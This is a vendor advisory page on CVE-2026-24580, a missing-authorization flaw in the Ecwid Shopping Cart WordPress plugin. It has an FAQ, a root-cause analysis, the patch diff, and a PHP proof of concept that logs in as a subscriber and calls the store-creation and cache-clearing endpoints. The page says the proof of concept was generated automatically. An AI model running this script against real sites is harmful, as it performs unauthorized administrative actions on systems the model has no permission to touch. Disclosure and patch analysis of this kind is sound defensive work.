What is CVE-2026-24580?

CVE-2026-24580 is a medium-severity vulnerability affecting the Ecwid Shopping Cart plugin for WordPress, specifically versions up to and including 7.0.5. It involves a missing authorization check that allows authenticated users with subscriber-level access or higher to perform unauthorized actions such as store creation and cache clearing.

How does the vulnerability work?

The vulnerability arises from insufficient capability checks in two AJAX functions within the plugin. Authenticated attackers can send requests to specific endpoints without proper nonce verification or user capability checks, allowing them to execute administrative functions.

Who is affected by this vulnerability?

Any WordPress site using the Ecwid Shopping Cart plugin version 7.0.5 or earlier is at risk. This includes sites where users have subscriber-level access or higher, as they can exploit the vulnerability to perform unauthorized actions.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Ecwid Shopping Cart plugin installed on your WordPress site. If it is version 7.0.5 or earlier, your site is susceptible to this vulnerability.

What steps should I take to fix this vulnerability?

To address CVE-2026-24580, update the Ecwid Shopping Cart plugin to version 7.0.6 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity level, suggesting that the vulnerability poses a moderate risk. While it requires authenticated access to exploit, it can lead to significant issues such as unauthorized store creation or cache clearing.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized store creation, disrupting business operations, and cache clearing, which may degrade site performance. Attackers could gain control over plugin functionalities, potentially leading to further security issues.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a POST request to the vulnerable AJAX endpoint without proper authorization checks. This demonstrates the ease of executing unauthorized actions with minimal privileges.

What are nonce tokens and why are they important?

Nonce tokens are unique, one-time-use tokens that help protect URLs and forms from misuse. They are crucial for verifying that requests made to the server are intentional and come from authenticated users, preventing CSRF attacks.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Ecwid Shopping Cart plugin until a patch can be applied. Additionally, review user permissions and limit access to only trusted users to mitigate potential exploitation.

Are there any other security practices I should follow?

In addition to keeping plugins updated, regularly review user roles and permissions, implement strong passwords, and use security plugins to monitor and protect your WordPress site from vulnerabilities.

Where can I find more information about this vulnerability?

For more information on CVE-2026-24580, refer to the official CVE database, WordPress security blogs, or the Ecwid plugin documentation. Staying informed through security advisories can help you maintain a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24580: Ecwid Shopping Cart <= 7.0.5 – Missing Authorization (ecwid-shopping-cart)

CVE ID CVE-2026-24580

Plugin ecwid-shopping-cart

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 7.0.5

Patched Version 7.0.6

Disclosed January 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24580:
The Ecwid Shopping Cart WordPress plugin contains a missing authorization vulnerability in versions up to and including 7.0.5. This flaw allows authenticated attackers with subscriber-level permissions or higher to perform unauthorized administrative actions, specifically store creation and cache clearing, due to insufficient capability checks.

Atomic Edge research identifies the root cause as the absence of capability verification in two critical AJAX functions. In the main plugin file `ecwid-shopping-cart.php`, the function `ecwid_ajax_create_store()` at line 2111 lacked both nonce verification and user capability checks. The `ecwid_clear_all_cache()` function at line 1829 also lacked nonce verification, allowing unauthorized cache clearing actions. These omissions violate WordPress security best practices for privileged operations.

Exploitation requires an authenticated attacker with any valid WordPress user account. For store creation, attackers send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `ecwid_ajax_create_store`. For cache clearing, attackers access the admin parameters page with the `ec-clear-all-cache` GET parameter. Both actions execute without verifying the user’s `manage_options` capability or validating nonce tokens, allowing subscribers to perform administrative functions.

The patch in version 7.0.6 implements multiple security improvements. The `ecwid_ajax_create_store()` function now includes `check_ajax_referer()` for nonce verification and `current_user_can(‘manage_options’)` for capability checking. The `ecwid_clear_all_cache()` function adds `wp_verify_nonce()` validation. The admin interface template `admin-params.php` generates proper nonced URLs for cache clearing. These changes ensure only administrators with valid nonces can execute privileged operations.

Successful exploitation allows attackers with minimal privileges to create new Ecwid stores and clear plugin caches. While store creation may disrupt business operations, cache clearing could degrade site performance. The vulnerability represents a privilege escalation vector where low-privileged users gain administrative control over plugin functionality, potentially leading to service disruption or unauthorized configuration changes.

Differential between vulnerable and patched code

Code Diff

--- a/ecwid-shopping-cart/ecwid-shopping-cart.php
+++ b/ecwid-shopping-cart/ecwid-shopping-cart.php
@@ -5,7 +5,7 @@
 Description: Ecwid by Lightspeed is a full-featured shopping cart. It can be easily integrated with any Wordpress blog and takes less than 5 minutes to set up.
 Text Domain: ecwid-shopping-cart
 Author: Ecwid Ecommerce
-Version: 7.0.5
+Version: 7.0.6
 Author URI: https://go.lightspeedhq.com/ecwid-site
 License: GPLv2 or later
 */
@@ -1829,7 +1829,14 @@

 function ecwid_clear_all_cache()
 {
-	if ( array_key_exists( ecwid_get_clear_all_cache_action(), $_GET ) ) {
+    $key = ecwid_get_clear_all_cache_action();
+
+	if ( array_key_exists( $key, $_GET ) ) {
+
+        if ( isset( $_GET['_wpnonce'] ) && ! wp_verify_nonce( wp_unslash( $_GET['_wpnonce'] ), $key ) ) {
+			return;
+		}
+
 		ecwid_full_cache_reset();

 		if ( array_key_exists( 'redirect_back', $_GET ) ) {
@@ -1896,7 +1903,8 @@
 			wp_enqueue_script('ecwid-welcome-page-js', ECWID_PLUGIN_URL . 'js/welcome-page.js', array(), get_option('ecwid_plugin_version'));
 			wp_localize_script('ecwid-welcome-page-js', 'ecwidParams', array(
 				'registerLink' => ecwid_get_register_link(),
-				'isWL' => Ecwid_Config::is_wl()
+				'isWL' => Ecwid_Config::is_wl(),
+                '_ajax_nonce' => wp_create_nonce( 'ec-create-store' ),
 				)
 			);

@@ -2111,6 +2119,14 @@
 }

 function ecwid_ajax_create_store() {
+    if ( ! check_ajax_referer( 'ec-create-store' ) ) {
+        die();
+    }
+
+    if ( ! current_user_can( 'manage_options' ) ) {
+        die();
+    }
+
 	$result = ecwid_create_store();
 	$is_store_created = is_array( $result ) && $result['response']['code'] == 200;

--- a/ecwid-shopping-cart/includes/shortcodes/class-ecwid-shortcode-product.php
+++ b/ecwid-shopping-cart/includes/shortcodes/class-ecwid-shortcode-product.php
@@ -66,6 +66,12 @@

 		$product = Ecwid_Product::get_without_loading( $this->_params['id'], (object) array( 'name' => '' ) );

+        if ( ! empty ( $product->price ) ) {
+            $price = $product->price;
+        } else {
+            $price = 0;
+        }
+
 		if ( is_array( $items ) && count( $items ) > 0 ) {
 			foreach ( $items as $item ) {
 				if ( array_key_exists( $item, $display_items ) ) {
@@ -73,8 +79,8 @@
 						$display_items[ $item ] = str_replace( '$name', $product->name, $display_items[ $item ] );
 					}

-					if ( $item == 'price' && ! empty( $product->price ) ) {
-						$display_items[ $item ] = str_replace( '$price', $product->price, $display_items[ $item ] );
+					if ( $item == 'price' ) {
+                        $display_items[ $item ] = str_replace( '$price', $price, $display_items[ $item ] );
 					}

 					if ( $this->_params['link'] == 'yes' && in_array( $item, array( 'title', 'picture' ) ) ) {
--- a/ecwid-shopping-cart/templates/admin-params.php
+++ b/ecwid-shopping-cart/templates/admin-params.php
@@ -67,4 +67,12 @@

 <br />
 <h2>Clear plugin cache</h2>
-<a href="?<?php echo esc_attr( ecwid_get_clear_all_cache_action() ); ?>&redirect_back">Clear all caches</a>
+<?php
+$ec_store_clear_cache_url = add_query_arg( array(
+    'page' => 'ec-params',
+    ecwid_get_clear_all_cache_action() => 1,
+    '_wpnonce' => wp_create_nonce( ecwid_get_clear_all_cache_action() ),
+    'redirect_back' => 1,
+) );
+?>
+<a href="<?php echo esc_attr( $ec_store_clear_cache_url ); ?>">Clear all caches</a>
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24580 - Ecwid Shopping Cart <= 7.0.5 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-24580
 * Demonstrates unauthorized store creation and cache clearing
 * Requires valid WordPress subscriber credentials
 */

$target_url = 'https://vulnerable-wordpress-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = wp_login($target_url, $username, $password);

if (!$ch) {
    die('Failed to authenticate with WordPress');
}

// Exploit 1: Unauthorized store creation via admin-ajax.php
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action' => 'ecwid_ajax_create_store'
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
echo "Store creation attempt response: " . $response . "nn";

// Exploit 2: Unauthorized cache clearing via admin parameters page
$cache_url = $target_url . '/wp-admin/admin.php?page=ec-params&ec-clear-all-cache=1&redirect_back=1';
curl_setopt($ch, CURLOPT_URL, $cache_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);

$response = curl_exec($ch);
echo "Cache clearing attempt completedn";

curl_close($ch);

/**
 * WordPress login helper function
 */
function wp_login($base_url, $username, $password) {
    $login_url = $base_url . '/wp-login.php';
    $ch = curl_init();
    
    // Get login page to retrieve nonce
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
    
    $response = curl_exec($ch);
    
    // Extract nonce from login form (simplified)
    preg_match('/name="log"[^>]*>/', $response, $matches);
    
    // Submit login credentials
    $post_data = array(
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $base_url . '/wp-admin/',
        'testcookie' => '1'
    );
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
    $response = curl_exec($ch);
    
    // Verify successful login by checking for admin bar
    if (strpos($response, 'wp-admin-bar') !== false) {
        return $ch;
    }
    
    curl_close($ch);
    return false;
}
?>

Frequently Asked Questions

What is CVE-2026-24580?
Overview of the vulnerability
CVE-2026-24580 is a medium-severity vulnerability affecting the Ecwid Shopping Cart plugin for WordPress, specifically versions up to and including 7.0.5. It involves a missing authorization check that allows authenticated users with subscriber-level access or higher to perform unauthorized actions such as store creation and cache clearing.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient capability checks in two AJAX functions within the plugin. Authenticated attackers can send requests to specific endpoints without proper nonce verification or user capability checks, allowing them to execute administrative functions.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Ecwid Shopping Cart plugin version 7.0.5 or earlier is at risk. This includes sites where users have subscriber-level access or higher, as they can exploit the vulnerability to perform unauthorized actions.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Ecwid Shopping Cart plugin installed on your WordPress site. If it is version 7.0.5 or earlier, your site is susceptible to this vulnerability.
What steps should I take to fix this vulnerability?
Mitigation and patching
To address CVE-2026-24580, update the Ecwid Shopping Cart plugin to version 7.0.6 or later, where the vulnerability has been patched. Regularly check for updates to ensure your plugins are secure.
What does a CVSS score of 4.3 mean?
Understanding severity ratings
A CVSS score of 4.3 indicates a medium severity level, suggesting that the vulnerability poses a moderate risk. While it requires authenticated access to exploit, it can lead to significant issues such as unauthorized store creation or cache clearing.
What are the practical risks of this vulnerability?
Potential impacts on your site
Exploitation of this vulnerability can lead to unauthorized store creation, disrupting business operations, and cache clearing, which may degrade site performance. Attackers could gain control over plugin functionalities, potentially leading to further security issues.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a POST request to the vulnerable AJAX endpoint without proper authorization checks. This demonstrates the ease of executing unauthorized actions with minimal privileges.
What are nonce tokens and why are they important?
Role of nonce in WordPress security
Nonce tokens are unique, one-time-use tokens that help protect URLs and forms from misuse. They are crucial for verifying that requests made to the server are intentional and come from authenticated users, preventing CSRF attacks.
What should I do if I cannot update the plugin immediately?
Temporary workarounds
If immediate updating is not possible, consider disabling the Ecwid Shopping Cart plugin until a patch can be applied. Additionally, review user permissions and limit access to only trusted users to mitigate potential exploitation.
Are there any other security practices I should follow?
General WordPress security recommendations
In addition to keeping plugins updated, regularly review user roles and permissions, implement strong passwords, and use security plugins to monitor and protect your WordPress site from vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
For more information on CVE-2026-24580, refer to the official CVE database, WordPress security blogs, or the Ecwid plugin documentation. Staying informed through security advisories can help you maintain a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations